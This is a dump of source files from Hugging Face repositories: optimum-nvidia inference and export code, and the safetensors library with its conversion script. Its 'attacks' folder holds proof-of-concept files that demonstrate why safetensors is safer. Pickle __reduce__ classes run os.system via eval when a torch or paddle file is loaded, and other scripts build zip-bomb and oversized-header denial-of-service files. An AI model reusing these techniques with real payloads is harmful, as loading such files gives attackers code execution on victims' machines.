+ return self._results.token_ids
1090
+
1091
+ @property
1092
+ def loss(self) -> None:
1093
+ return None
1094
+
1095
+ class CausalLM(HuggingFaceHubModel, InferenceRuntimeBase):
1096
+
1097
+ def __init__(self, engines_path: Union[str, PathLike, Path], generation_config: 'GenerationConfig', executor_config: Optional['ExecutorConfig']=None, load_engines: bool=True):
1098
+ InferenceRuntimeBase.__init__(self, engines_path, generation_config, executor_config, load_engines)
1099
+ HuggingFaceHubModel.__init__(self, engines_path)
1100
+
1101
+ def _save_additional_parcels(self, save_directory: Path):
1102
+ self._generation_config.save_pretrained(save_directory, 'generation_config.json')
1103
+
1104
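A hedged sketch of driving the runtime above directly (placeholder token ids; `model` is assumed to be a `CausalLM` loaded with `load_engines=True`, and a recent transformers version is assumed for the GenerationConfig fields read by `convert_generation_config`):

from transformers import GenerationConfig

prompt_ids = [1, 15043, 29892]              # placeholder token ids
output_ids = model.generate(prompt_ids)     # sampling derives from the stored GenerationConfig
# Per-call overrides go through a regular transformers GenerationConfig:
output_ids = model.generate(prompt_ids, GenerationConfig(max_new_tokens=32, do_sample=False))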
+ # File: optimum-nvidia-main/src/optimum/nvidia/subpackage/commands/export.py
1105
+ import sys
1106
+ from typing import TYPE_CHECKING, Optional, Union
1107
+ from transformers import AutoConfig, AutoTokenizer
1108
+ from optimum.commands import optimum_cli_subcommand
1109
+ from optimum.commands.base import BaseOptimumCLICommand, CommandInfo
1110
+ from optimum.commands.export.base import ExportCommand
1111
+ from optimum.nvidia import AutoModelForCausalLM, ExportConfig
1112
+ from optimum.nvidia.export.cli import common_trtllm_export_args
1113
+ if TYPE_CHECKING:
1114
+ from argparse import ArgumentParser, Namespace, _SubParsersAction
1115
+ from pathlib import Path
1116
+ OPTIMUM_NVIDIA_CLI_QUANTIZATION_TARGET_REF = 'TARGET_QUANTIZATION_RECIPE'
1117
+
1118
+ def import_source_file(fname: Union[str, 'Path'], modname: str):
1119
+ import importlib.util
1120
+ spec = importlib.util.spec_from_file_location(modname, fname)
1121
+ module = importlib.util.module_from_spec(spec)
1122
+ sys.modules[modname] = module
1123
+ spec.loader.exec_module(module)
1124
+
1125
+ @optimum_cli_subcommand(ExportCommand)
1126
+ class TrtLlmExportCommand(BaseOptimumCLICommand):
1127
+ COMMAND = CommandInfo(name='trtllm', help='Export PyTorch models to TensorRT-LLM compiled engines')
1128
+
1129
+ def __init__(self, subparsers: '_SubParsersAction', args: Optional['Namespace']=None, command: Optional['CommandInfo']=None, from_defaults_factory: bool=False, parser: Optional['ArgumentParser']=None):
1130
+ super().__init__(subparsers, args=args, command=command, from_defaults_factory=from_defaults_factory, parser=parser)
1131
+ self.args_string = ' '.join(sys.argv[3:])
1132
+
1133
+ @staticmethod
1134
+ def parse_args(parser: 'ArgumentParser'):
1135
+ return common_trtllm_export_args(parser)
1136
+
1137
+ def run(self):
1138
+ args = self.args
1139
+ if args.quantization:
1140
+ tokenizer = AutoTokenizer.from_pretrained(args.model)
1141
+ import_source_file(args.quantization, 'recipe')
1142
+ try:
1143
+ from recipe import TARGET_QUANTIZATION_RECIPE
1144
+ qconfig = TARGET_QUANTIZATION_RECIPE(tokenizer)
1145
+ except ImportError:
1146
+ raise ModuleNotFoundError(f"Global variable 'TARGET_QUANTIZATION_RECIPE' was not found in {args.quantization}. This is required to automatically detect and allocate the right recipe for quantization.")
1147
+ else:
1148
+ qconfig = None
1149
+ config = AutoConfig.from_pretrained(args.model)
1150
+ export = ExportConfig.from_config(config, args.max_batch_size)
1151
+ model = AutoModelForCausalLM.from_pretrained(args.model, export_config=export, quantization_config=qconfig, export_only=True, force_export=True)
1152
+ if args.destination:
1153
+ model.save_pretrained(args.destination)
1154
+ if args.push_to_hub:
1155
+ print(f'Exporting model to the Hugging Face Hub: {args.push_to_hub}')
1156
+ model.push_to_hub(args.push_to_hub, commit_message=f'Optimum-CLI TensorRT-LLM {args.model} export')
1157
+
1158
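When `--quantization` points to a Python file, the command above imports it as a module named `recipe` and calls its `TARGET_QUANTIZATION_RECIPE` with the tokenizer. A hedged skeleton of such a file (the concrete `ModelOptRecipe` subclass and its arguments are assumptions that depend on the installed optimum-nvidia version):

# recipe.py -- hypothetical quantization recipe module passed to the CLI.
def TARGET_QUANTIZATION_RECIPE(tokenizer):
    # Must return an optimum.nvidia ModelOptRecipe describing the calibration data
    # (typically built with `tokenizer`) and the target quantization scheme.
    raise NotImplementedError('return a concrete ModelOptRecipe for your setup')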
+ # File: optimum-nvidia-main/templates/inference-endpoints/postprocessing/1/model.py
1159
+ import json
1160
+ import numpy as np
1161
+ import triton_python_backend_utils as pb_utils
1162
+ from transformers import AutoTokenizer, LlamaTokenizer, T5Tokenizer
1163
+
1164
+ class TritonPythonModel:
1165
+ __slots__ = ('tokenizer', 'output_dtype')
1166
+
1167
+ def initialize(self, args):
1168
+ model_config = json.loads(args['model_config'])
1169
+ tokenizer_dir = model_config['parameters']['tokenizer_dir']['string_value']
1170
+ self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_dir, padding_side='left')
1171
+ self.tokenizer.pad_token = self.tokenizer.eos_token
1172
+ output_config = pb_utils.get_output_config_by_name(model_config, 'OUTPUT')
1173
+ self.output_dtype = pb_utils.triton_string_to_numpy(output_config['data_type'])
1174
+
1175
+ def execute(self, requests):
1176
+ responses = []
1177
+ for (idx, request) in enumerate(requests):
1178
+ tokens_batch = pb_utils.get_input_tensor_by_name(request, 'TOKENS_BATCH').as_numpy()
1179
+ outputs = self._postprocessing(tokens_batch)
1180
+ output_tensor = pb_utils.Tensor('OUTPUT', np.array(outputs).astype(self.output_dtype))
1181
+ inference_response = pb_utils.InferenceResponse(output_tensors=[output_tensor])
1182
+ responses.append(inference_response)
1183
+ return responses
1184
+
1185
+ def finalize(self):
1186
+ print('Cleaning up...')
1187
+
1188
+ def _postprocessing(self, tokens_batch):
1189
+ outputs = []
1190
+ for beam_tokens in tokens_batch:
1191
+ for tokens in beam_tokens:
1192
+ output = self.tokenizer.decode(tokens)
1193
+ outputs.append(output.encode('utf8'))
1194
+ return outputs
1195
+
1196
+ # File: optimum-nvidia-main/templates/inference-endpoints/preprocessing/1/model.py
1197
+ import csv
1198
+ import json
1199
+ from pathlib import Path
1200
+ from typing import List, Sequence
1201
+ import numpy as np
1202
+ import triton_python_backend_utils as pb_utils
1203
+ from tokenizers import Tokenizer
1204
+ INPUT_NAMES = {'INPUT_ID', 'REQUEST_INPUT_LEN', 'BAD_WORDS_IDS', 'STOP_WORDS_IDS'}
1205
+
1206
+ class TritonPythonModel:
1207
+ __slots__ = ('tokenizer', 'pad_token', 'pad_token_id', 'input_id_dtype', 'request_input_len_dtype', 'bad_words_ids_dtype', 'stop_words_ids_dtype')
1208
+
1209
+ def initialize(self, args):
1210
+ model_config = json.loads(args['model_config'])
1211
+ tokenizer_dir = Path(model_config['parameters']['tokenizer_dir']['string_value'])
1212
+ tokenizer_path = tokenizer_dir.joinpath('tokenizer.json')
1213
+ pad_to_multiple_of = int(model_config['parameters']['pad_to_multiple_of']['string_value'])
1214
+ special_tokens_map_path = tokenizer_dir.joinpath('special_tokens_map.json')
1215
+ with open(special_tokens_map_path, 'r', encoding='utf-8') as special_tokens_f:
1216
+ special_tokens_map = json.load(special_tokens_f)
1217
+ self.tokenizer = Tokenizer.from_file(str(tokenizer_path))
1218
+ if 'eos_token' in special_tokens_map:
1219
+ eos_token = special_tokens_map['eos_token']['content']
1220
+ eos_token_id = self.tokenizer.encode(eos_token, add_special_tokens=False).ids[0]
1221
+ self.pad_token = eos_token
1222
+ self.pad_token_id = eos_token_id
1223
+ for name in INPUT_NAMES:
1224
+ dtype = pb_utils.triton_string_to_numpy(pb_utils.get_output_config_by_name(model_config, name)['data_type'])
1225
+ setattr(self, name.lower() + '_dtype', dtype)
1226
+
1227
+ def execute(self, requests: Sequence):
1228
+ responses = []
1229
+ for request in requests:
1230
+ response = self.handle_request(request)
1231
+ responses.append(response)
1232
+ return responses
1233
+
1234
+ def finalize(self):
1235
+ print('Cleaning up...')
1236
+
1237
+ def handle_request(self, request: Sequence):
1238
+ query = pb_utils.get_input_tensor_by_name(request, 'QUERY').as_numpy().item().decode('utf-8')
1239
+ request_output_len = pb_utils.get_input_tensor_by_name(request, 'REQUEST_OUTPUT_LEN')
1240
+ encoding = self.tokenizer.encode(query)
1241
+ bad_words_ids = pb_utils.Tensor('BAD_WORDS_IDS', np.array([[], []], dtype=self.bad_words_ids_dtype))
1242
+ stop_words_ids = pb_utils.Tensor('STOP_WORDS_IDS', np.array([[], []], dtype=self.stop_words_ids_dtype))
1243
+ input_ids = pb_utils.Tensor('INPUT_ID', np.array([encoding.ids], dtype=self.input_id_dtype))
1244
+ request_input_len = pb_utils.Tensor('REQUEST_INPUT_LEN', np.array([[len(encoding.ids)]], dtype=self.request_input_len_dtype))
1245
+ return pb_utils.InferenceResponse(output_tensors=[input_ids, bad_words_ids, stop_words_ids, request_input_len, request_output_len])
1246
+
1247
+ def _to_word_list_format(self, word_dict: List[List[str]]):
1248
+ assert self.tokenizer is not None, 'need to set tokenizer'
1249
+ flat_ids = []
1250
+ offsets = []
1251
+ for word_dict_item in word_dict:
1252
+ item_flat_ids = []
1253
+ item_offsets = []
1254
+ if isinstance(word_dict_item[0], bytes):
1255
+ word_dict_item = [word_dict_item[0].decode()]
1256
+ words = list(csv.reader(word_dict_item))[0]
1257
+ for word in words:
1258
+ ids = self.tokenizer.encode(word)
1259
+ if len(ids) == 0:
1260
+ continue
1261
+ item_flat_ids += ids
1262
+ item_offsets.append(len(ids))
1263
+ flat_ids.append(np.array(item_flat_ids))
1264
+ offsets.append(np.cumsum(np.array(item_offsets)))
1265
+ pad_to = max(1, max((len(ids) for ids in flat_ids)))
1266
+ for (i, (ids, offs)) in enumerate(zip(flat_ids, offsets)):
1267
+ flat_ids[i] = np.pad(ids, (0, pad_to - len(ids)), constant_values=0)
1268
+ offsets[i] = np.pad(offs, (0, pad_to - len(offs)), constant_values=-1)
1269
+ return np.array([flat_ids, offsets], dtype='int32').transpose((1, 0, 2))
1270
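For clarity, `_to_word_list_format` above returns a `(batch, 2, width)` int32 array: row 0 holds the concatenated token ids of all words in an item and row 1 their cumulative end offsets, padded with 0 and -1 respectively. A small hedged illustration with made-up token ids:

import numpy as np

# One item containing the words "foo,bar" tokenised as [7] and [8, 9]:
expected = np.array([[[7, 8, 9],      # flat token ids for the item
                      [1, 3, -1]]],   # cumulative offsets, padded with -1
                    dtype='int32')
assert expected.shape == (1, 2, 3)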
+
huggingface_optimum-quanto.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_optimum.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_peft.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_pixparse.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_pytorch-image-models.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_safetensors.txt ADDED
@@ -0,0 +1,1038 @@
1
+ # File: safetensors-main/attacks/numpy_dos_get_pwned.py
2
+ import os
3
+ import numpy as np
4
+ filename = 'numpy_dos.npz'
5
+ print(f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine.")
6
+ print('Be careful this might crash your computer by reserving way too much RAM')
7
+ input('Press Enter to continue')
8
+ archive = np.load(filename)
9
+ weights = archive['weight']
10
+ assert np.allclose(weights, np.zeros((2, 2)))
11
+ print('The file looks fine !')
12
+
13
+ # File: safetensors-main/attacks/paddle_ace_create.py
14
+ import paddle
15
+ import numpy as np
16
+ from collections import Iterable, OrderedDict
17
+
18
+ def _parse_every_object(obj, condition_func, convert_func):
19
+ if condition_func(obj):
20
+ return convert_func(obj)
21
+ elif isinstance(obj, (dict, OrderedDict, list)):
22
+ if isinstance(obj, list):
23
+ keys = range(len(obj))
24
+ else:
25
+ keys = list(obj.keys())
26
+ for key in keys:
27
+ if condition_func(obj[key]):
28
+ obj[key] = convert_func(obj[key])
29
+ else:
30
+ obj[key] = _parse_every_object(obj[key], condition_func, convert_func)
31
+ return obj
32
+ elif isinstance(obj, tuple):
33
+ return tuple(_parse_every_object(list(obj), condition_func, convert_func))
34
+ elif isinstance(obj, set):
35
+ return set(_parse_every_object(list(obj), condition_func, convert_func))
36
+ else:
37
+ return obj
38
+ paddle.framework.io._parse_every_object = _parse_every_object
39
+
40
+ class BadDict(dict):
41
+
42
+ def __init__(self, src: str, **kwargs):
43
+ super().__init__(**kwargs)
44
+ self.src = src
45
+
46
+ def __reduce__(self):
47
+ return (eval, (f"os.system('{self.src}') or dict()",), None, None, iter(self.items()))
48
+ paddle.save([BadDict('echo "pwned your computer, I can do anything I want."', **{'weight': paddle.zeros((2, 2))})], 'paddle_ace.pdparams')
49
+
50
+ # File: safetensors-main/attacks/safetensors_abuse_attempt_1.py
51
+ import torch
52
+ from safetensors.torch import load_file, save_file
53
+ filename = 'safetensors_abuse_attempt_1.safetensors'
54
+
55
+ def create_payload():
56
+ weights = {'weight': torch.zeros((2, 2))}
57
+ save_file(weights, filename)
58
+ with open(filename, 'r+b') as f:
59
+ f.seek(0)
60
+ n = 1000
61
+ n_bytes = n.to_bytes(8, 'little')
62
+ f.write(n_bytes)
63
+ create_payload()
64
+ test = load_file(filename)
65
+
66
+ # File: safetensors-main/attacks/safetensors_abuse_attempt_2.py
67
+ import datetime
68
+ import json
69
+ import os
70
+ from safetensors.torch import load_file
71
+ filename = 'safetensors_abuse_attempt_2.safetensors'
72
+
73
+ def create_payload():
74
+ shape = [2, 2]
75
+ n = shape[0] * shape[1] * 4
76
+ metadata = {f'weight_{i}': {'dtype': 'F32', 'shape': shape, 'data_offsets': [0, n]} for i in range(1000 * 1000 * 10)}
77
+ binary = json.dumps(metadata).encode('utf-8')
78
+ n = len(binary)
79
+ n_header = n.to_bytes(8, 'little')
80
+ with open(filename, 'wb') as f:
81
+ f.write(n_header)
82
+ f.write(binary)
83
+ f.write(b'\x00' * n)
84
+ create_payload()
85
+ print(f'The file {filename} is {os.path.getsize(filename) / 1000 / 1000} Mo')
86
+ start = datetime.datetime.now()
87
+ test = load_file(filename)
88
+ print(f'Loading the file took {datetime.datetime.now() - start}')
89
+
90
+ # File: safetensors-main/attacks/safetensors_abuse_attempt_3.py
91
+ import datetime
92
+ import json
93
+ import os
94
+ from safetensors.torch import load_file
95
+ filename = 'safetensors_abuse_attempt_2.safetensors'
96
+
97
+ def create_payload():
98
+ shape = [200, 200]
99
+ n = shape[0] * shape[1] * 4
100
+ metadata = {f'weight_{i}': {'dtype': 'F32', 'shape': shape, 'data_offsets': [0, n]} for i in range(1000 * 100)}
101
+ binary = json.dumps(metadata).encode('utf-8')
102
+ n = len(binary)
103
+ n_header = n.to_bytes(8, 'little')
104
+ with open(filename, 'wb') as f:
105
+ f.write(n_header)
106
+ f.write(binary)
107
+ f.write(b'\x00' * n)
108
+ create_payload()
109
+ print(f'The file {filename} is {os.path.getsize(filename) / 1000 / 1000} Mo')
110
+ start = datetime.datetime.now()
111
+ test = load_file(filename)
112
+ print(f'Loading the file took {datetime.datetime.now() - start}')
113
+
114
+ # File: safetensors-main/attacks/tf_ace_get_pwned.py
115
+ import base64
116
+ import json
117
+ import h5py
118
+ import tensorflow as tf
119
+ new_model = tf.keras.models.load_model('tf.h5')
120
+ print('Transformers is not vulnerable to this, as it uses h5 directly.')
121
+ print('Keras uses a pickled code of the function within the `h5` attrs of the file')
122
+ print("Let's show you the marshalled code")
123
+ with h5py.File('tf_ace.h5') as f:
124
+ data = json.loads(f.attrs['model_config'])
125
+ print(base64.b64decode(data['config']['layers'][-1]['config']['function'][0]))
126
+ pass
127
+
128
+ # File: safetensors-main/attacks/torch_ace_create.py
129
+ import torch
130
+
131
+ class BadDict(dict):
132
+
133
+ def __init__(self, src: str, **kwargs):
134
+ super().__init__(**kwargs)
135
+ self.src = src
136
+
137
+ def __reduce__(self):
138
+ return (eval, (f"os.system('{self.src}') or dict()",), None, None, iter(self.items()))
139
+ torch.save(BadDict('echo "pwned your computer, I can do anything I want."', **{'weight': torch.zeros((2, 2))}), 'torch_ace.pt')
140
+
141
+ # File: safetensors-main/attacks/torch_dos_create.py
142
+ import os
143
+ from zipfile import ZIP_DEFLATED, ZipFile
144
+ import torch
145
+ FILESIZE = 40 * 1000
146
+ BUFFER = b'\x00' * 1000 * 1000
147
+ filename = 'torch_dos_tmp.pt'
148
+ torch.save({'weight': torch.zeros((2, 2))}, filename)
149
+ with ZipFile(filename, 'r') as torch_zip:
150
+ outfilename = 'torch_dos.pt'
151
+ with ZipFile(outfilename, 'w', compression=ZIP_DEFLATED) as outzip:
152
+ outzip.writestr('archive/data.pkl', torch_zip.open('archive/data.pkl').read())
153
+ outzip.writestr('archive/version', torch_zip.open('archive/version').read())
154
+ with outzip.open('archive/data/0', 'w', force_zip64=True) as f:
155
+ for i in range(FILESIZE):
156
+ f.write(BUFFER)
157
+ os.remove(filename)
158
+
159
+ # File: safetensors-main/attacks/torch_dos_get_pwned.py
160
+ import os
161
+ import torch
162
+ filename = 'torch_dos.pt'
163
+ print(f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine.")
164
+ print('Be careful this might crash your computer by reserving way too much RAM')
165
+ input('Press Enter to continue')
166
+ weights = torch.load(filename)
167
+ assert list(weights.keys()) == ['weight']
168
+ assert torch.allclose(weights['weight'], torch.zeros((2, 2)))
169
+ print('The file looks fine !')
170
+
171
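The attack scripts above are exactly what the format is designed to rule out: loading a `.safetensors` file deserialises tensors only and never unpickles code. A minimal sketch using the same helpers imported earlier in this file:

import torch
from safetensors.torch import load_file, save_file

save_file({'weight': torch.zeros((2, 2))}, 'safe_demo.safetensors')
weights = load_file('safe_demo.safetensors')   # no pickle, no arbitrary code execution
assert torch.allclose(weights['weight'], torch.zeros((2, 2)))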
+ # File: safetensors-main/bindings/python/convert.py
172
+ import argparse
173
+ import json
174
+ import os
175
+ import shutil
176
+ from collections import defaultdict
177
+ from tempfile import TemporaryDirectory
178
+ from typing import Dict, List, Optional, Set, Tuple
179
+ import torch
180
+ from huggingface_hub import CommitInfo, CommitOperationAdd, Discussion, HfApi, hf_hub_download
181
+ from huggingface_hub.file_download import repo_folder_name
182
+ from safetensors.torch import _find_shared_tensors, _is_complete, load_file, save_file
183
+ COMMIT_DESCRIPTION = '\nThis is an automated PR created with https://huggingface.co/spaces/safetensors/convert\n\nThis new file is equivalent to `pytorch_model.bin` but safe in the sense that\nno arbitrary code can be put into it.\n\nThese files also happen to load much faster than their pytorch counterpart:\nhttps://colab.research.google.com/github/huggingface/notebooks/blob/main/safetensors_doc/en/speed.ipynb\n\nThe widgets on your model page will run using this model even if this is not merged\nmaking sure the file actually works.\n\nIf you find any issues: please report here: https://huggingface.co/spaces/safetensors/convert/discussions\n\nFeel free to ignore this PR.\n'
184
+ ConversionResult = Tuple[List['CommitOperationAdd'], List[Tuple[str, 'Exception']]]
185
+
186
+ def _remove_duplicate_names(state_dict: Dict[str, torch.Tensor], *, preferred_names: List[str]=None, discard_names: List[str]=None) -> Dict[str, List[str]]:
187
+ if preferred_names is None:
188
+ preferred_names = []
189
+ preferred_names = set(preferred_names)
190
+ if discard_names is None:
191
+ discard_names = []
192
+ discard_names = set(discard_names)
193
+ shareds = _find_shared_tensors(state_dict)
194
+ to_remove = defaultdict(list)
195
+ for shared in shareds:
196
+ complete_names = set([name for name in shared if _is_complete(state_dict[name])])
197
+ if not complete_names:
198
+ if len(shared) == 1:
199
+ name = list(shared)[0]
200
+ state_dict[name] = state_dict[name].clone()
201
+ complete_names = {name}
202
+ else:
203
+ raise RuntimeError(f'Error while trying to find names to remove to save state dict, but found no suitable name to keep for saving amongst: {shared}. None is covering the entire storage.Refusing to save/load the model since you could be storing much more memory than needed. Please refer to https://huggingface.co/docs/safetensors/torch_shared_tensors for more information. Or open an issue.')
204
+ keep_name = sorted(list(complete_names))[0]
205
+ preferred = complete_names.difference(discard_names)
206
+ if preferred:
207
+ keep_name = sorted(list(preferred))[0]
208
+ if preferred_names:
209
+ preferred = preferred_names.intersection(complete_names)
210
+ if preferred:
211
+ keep_name = sorted(list(preferred))[0]
212
+ for name in sorted(shared):
213
+ if name != keep_name:
214
+ to_remove[keep_name].append(name)
215
+ return to_remove
216
+
217
+ def get_discard_names(model_id: str, revision: Optional[str], folder: str, token: Optional[str]) -> List[str]:
218
+ try:
219
+ import json
220
+ import transformers
221
+ config_filename = hf_hub_download(model_id, revision=revision, filename='config.json', token=token, cache_dir=folder)
222
+ with open(config_filename, 'r') as f:
223
+ config = json.load(f)
224
+ architecture = config['architectures'][0]
225
+ class_ = getattr(transformers, architecture)
226
+ discard_names = getattr(class_, '_tied_weights_keys', [])
227
+ except Exception:
228
+ discard_names = []
229
+ return discard_names
230
+
231
+ class AlreadyExists(Exception):
232
+ pass
233
+
234
+ def check_file_size(sf_filename: str, pt_filename: str):
235
+ sf_size = os.stat(sf_filename).st_size
236
+ pt_size = os.stat(pt_filename).st_size
237
+ if (sf_size - pt_size) / pt_size > 0.01:
238
+ raise RuntimeError(f'The file size difference is more than 1%:\n - {sf_filename}: {sf_size}\n - {pt_filename}: {pt_size}\n ')
239
+
240
+ def rename(pt_filename: str) -> str:
241
+ (filename, ext) = os.path.splitext(pt_filename)
242
+ local = f'{filename}.safetensors'
243
+ local = local.replace('pytorch_model', 'model')
244
+ return local
245
+
246
+ def convert_multi(model_id: str, *, revision: Optional[str], folder: str, token: Optional[str], discard_names: List[str]) -> ConversionResult:
247
+ filename = hf_hub_download(repo_id=model_id, revision=revision, filename='pytorch_model.bin.index.json', token=token, cache_dir=folder)
248
+ with open(filename, 'r') as f:
249
+ data = json.load(f)
250
+ filenames = set(data['weight_map'].values())
251
+ local_filenames = []
252
+ for filename in filenames:
253
+ pt_filename = hf_hub_download(repo_id=model_id, filename=filename, token=token, cache_dir=folder)
254
+ sf_filename = rename(pt_filename)
255
+ sf_filename = os.path.join(folder, sf_filename)
256
+ convert_file(pt_filename, sf_filename, discard_names=discard_names)
257
+ local_filenames.append(sf_filename)
258
+ index = os.path.join(folder, 'model.safetensors.index.json')
259
+ with open(index, 'w') as f:
260
+ newdata = {k: v for (k, v) in data.items()}
261
+ newmap = {k: rename(v) for (k, v) in data['weight_map'].items()}
262
+ newdata['weight_map'] = newmap
263
+ json.dump(newdata, f, indent=4)
264
+ local_filenames.append(index)
265
+ operations = [CommitOperationAdd(path_in_repo=os.path.basename(local), path_or_fileobj=local) for local in local_filenames]
266
+ errors: List[Tuple[str, 'Exception']] = []
267
+ return (operations, errors)
268
+
269
+ def convert_single(model_id: str, *, revision: Optional[str], folder: str, token: Optional[str], discard_names: List[str]) -> ConversionResult:
270
+ pt_filename = hf_hub_download(repo_id=model_id, revision=revision, filename='pytorch_model.bin', token=token, cache_dir=folder)
271
+ sf_name = 'model.safetensors'
272
+ sf_filename = os.path.join(folder, sf_name)
273
+ convert_file(pt_filename, sf_filename, discard_names)
274
+ operations = [CommitOperationAdd(path_in_repo=sf_name, path_or_fileobj=sf_filename)]
275
+ errors: List[Tuple[str, 'Exception']] = []
276
+ return (operations, errors)
277
+
278
+ def convert_file(pt_filename: str, sf_filename: str, discard_names: List[str]):
279
+ loaded = torch.load(pt_filename, map_location='cpu')
280
+ if 'state_dict' in loaded:
281
+ loaded = loaded['state_dict']
282
+ to_removes = _remove_duplicate_names(loaded, discard_names=discard_names)
283
+ metadata = {'format': 'pt'}
284
+ for (kept_name, to_remove_group) in to_removes.items():
285
+ for to_remove in to_remove_group:
286
+ if to_remove not in metadata:
287
+ metadata[to_remove] = kept_name
288
+ del loaded[to_remove]
289
+ loaded = {k: v.contiguous() for (k, v) in loaded.items()}
290
+ dirname = os.path.dirname(sf_filename)
291
+ os.makedirs(dirname, exist_ok=True)
292
+ save_file(loaded, sf_filename, metadata=metadata)
293
+ check_file_size(sf_filename, pt_filename)
294
+ reloaded = load_file(sf_filename)
295
+ for k in loaded:
296
+ pt_tensor = loaded[k]
297
+ sf_tensor = reloaded[k]
298
+ if not torch.equal(pt_tensor, sf_tensor):
299
+ raise RuntimeError(f'The output tensors do not match for key {k}')
300
+
301
+ def create_diff(pt_infos: Dict[str, List[str]], sf_infos: Dict[str, List[str]]) -> str:
302
+ errors = []
303
+ for key in ['missing_keys', 'mismatched_keys', 'unexpected_keys']:
304
+ pt_set = set(pt_infos[key])
305
+ sf_set = set(sf_infos[key])
306
+ pt_only = pt_set - sf_set
307
+ sf_only = sf_set - pt_set
308
+ if pt_only:
309
+ errors.append(f'{key} : PT warnings contain {pt_only} which are not present in SF warnings')
310
+ if sf_only:
311
+ errors.append(f'{key} : SF warnings contain {sf_only} which are not present in PT warnings')
312
+ return '\n'.join(errors)
313
+
314
+ def previous_pr(api: 'HfApi', model_id: str, pr_title: str, revision: Optional[str]) -> Optional['Discussion']:
315
+ try:
316
+ revision_commit = api.model_info(model_id, revision=revision).sha
317
+ discussions = api.get_repo_discussions(repo_id=model_id)
318
+ except Exception:
319
+ return None
320
+ for discussion in discussions:
321
+ if discussion.status in {'open', 'closed'} and discussion.is_pull_request and (discussion.title == pr_title):
322
+ commits = api.list_repo_commits(model_id, revision=discussion.git_reference)
323
+ if revision_commit == commits[1].commit_id:
324
+ return discussion
325
+ return None
326
+
327
+ def convert_generic(model_id: str, *, revision: Optional[str], folder: str, filenames: Set[str], token: Optional[str]) -> ConversionResult:
328
+ operations = []
329
+ errors = []
330
+ extensions = set(['.bin', '.ckpt'])
331
+ for filename in filenames:
332
+ (prefix, ext) = os.path.splitext(filename)
333
+ if ext in extensions:
334
+ pt_filename = hf_hub_download(model_id, revision=revision, filename=filename, token=token, cache_dir=folder)
335
+ (dirname, raw_filename) = os.path.split(filename)
336
+ if raw_filename == 'pytorch_model.bin':
337
+ sf_in_repo = os.path.join(dirname, 'model.safetensors')
338
+ else:
339
+ sf_in_repo = f'{prefix}.safetensors'
340
+ sf_filename = os.path.join(folder, sf_in_repo)
341
+ try:
342
+ convert_file(pt_filename, sf_filename, discard_names=[])
343
+ operations.append(CommitOperationAdd(path_in_repo=sf_in_repo, path_or_fileobj=sf_filename))
344
+ except Exception as e:
345
+ errors.append((pt_filename, e))
346
+ return (operations, errors)
347
+
348
+ def convert(api: 'HfApi', model_id: str, revision: Optional[str]=None, force: bool=False) -> Tuple['CommitInfo', List[Tuple[str, 'Exception']]]:
349
+ pr_title = 'Adding `safetensors` variant of this model'
350
+ info = api.model_info(model_id, revision=revision)
351
+ filenames = set((s.rfilename for s in info.siblings))
352
+ with TemporaryDirectory() as d:
353
+ folder = os.path.join(d, repo_folder_name(repo_id=model_id, repo_type='models'))
354
+ os.makedirs(folder)
355
+ new_pr = None
356
+ try:
357
+ operations = None
358
+ pr = previous_pr(api, model_id, pr_title, revision=revision)
359
+ library_name = getattr(info, 'library_name', None)
360
+ if any((filename.endswith('.safetensors') for filename in filenames)) and (not force):
361
+ raise AlreadyExists(f'Model {model_id} is already converted, skipping..')
362
+ elif pr is not None and (not force):
363
+ url = f'https://huggingface.co/{model_id}/discussions/{pr.num}'
364
+ new_pr = pr
365
+ raise AlreadyExists(f'Model {model_id} already has an open PR check out {url}')
366
+ elif library_name == 'transformers':
367
+ discard_names = get_discard_names(model_id, revision=revision, folder=folder, token=api.token)
368
+ if 'pytorch_model.bin' in filenames:
369
+ (operations, errors) = convert_single(model_id, revision=revision, folder=folder, token=api.token, discard_names=discard_names)
370
+ elif 'pytorch_model.bin.index.json' in filenames:
371
+ (operations, errors) = convert_multi(model_id, revision=revision, folder=folder, token=api.token, discard_names=discard_names)
372
+ else:
373
+ raise RuntimeError(f"Model {model_id} doesn't seem to be a valid pytorch model. Cannot convert")
374
+ else:
375
+ (operations, errors) = convert_generic(model_id, revision=revision, folder=folder, filenames=filenames, token=api.token)
376
+ if operations:
377
+ new_pr = api.create_commit(repo_id=model_id, revision=revision, operations=operations, commit_message=pr_title, commit_description=COMMIT_DESCRIPTION, create_pr=True)
378
+ print(f'Pr created at {new_pr.pr_url}')
379
+ else:
380
+ print('No files to convert')
381
+ finally:
382
+ shutil.rmtree(folder)
383
+ return (new_pr, errors)
384
+ if __name__ == '__main__':
385
+ DESCRIPTION = '\n Simple utility tool to convert automatically some weights on the hub to `safetensors` format.\n It is PyTorch exclusive for now.\n It works by downloading the weights (PT), converting them locally, and uploading them back\n as a PR on the hub.\n '
386
+ parser = argparse.ArgumentParser(description=DESCRIPTION)
387
+ parser.add_argument('model_id', type=str, help='The name of the model on the hub to convert. E.g. `gpt2` or `facebook/wav2vec2-base-960h`')
388
+ parser.add_argument('--revision', type=str, help='The revision to convert')
389
+ parser.add_argument('--force', action='store_true', help='Create the PR even if it already exists or if the model was already converted.')
390
+ parser.add_argument('-y', action='store_true', help='Ignore safety prompt')
391
+ args = parser.parse_args()
392
+ model_id = args.model_id
393
+ api = HfApi()
394
+ if args.y:
395
+ txt = 'y'
396
+ else:
397
+ txt = input('This conversion script will unpickle a pickled file, which is inherently unsafe. If you do not trust this file, we invite you to use https://huggingface.co/spaces/safetensors/convert or Google Colab or another hosted solution to avoid potential issues with this file. Continue [Y/n] ?')
398
+ if txt.lower() in {'', 'y'}:
399
+ (commit_info, errors) = convert(api, model_id, revision=args.revision, force=args.force)
400
+ string = f'\n### Success 🔥\nYay! This model was successfully converted and a PR was open using your token, here:\n[{commit_info.pr_url}]({commit_info.pr_url})\n '
401
+ if errors:
402
+ string += '\nErrors during conversion:\n'
403
+ string += '\n'.join((f'Error while converting {filename}: {e}, skipped conversion' for (filename, e) in errors))
404
+ print(string)
405
+ else:
406
+ print(f'Answer was `{txt}` aborting.')
407
+
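For reference, a minimal invocation of the conversion script above, using the example model ids from its own help text (the exact model id is illustrative only):

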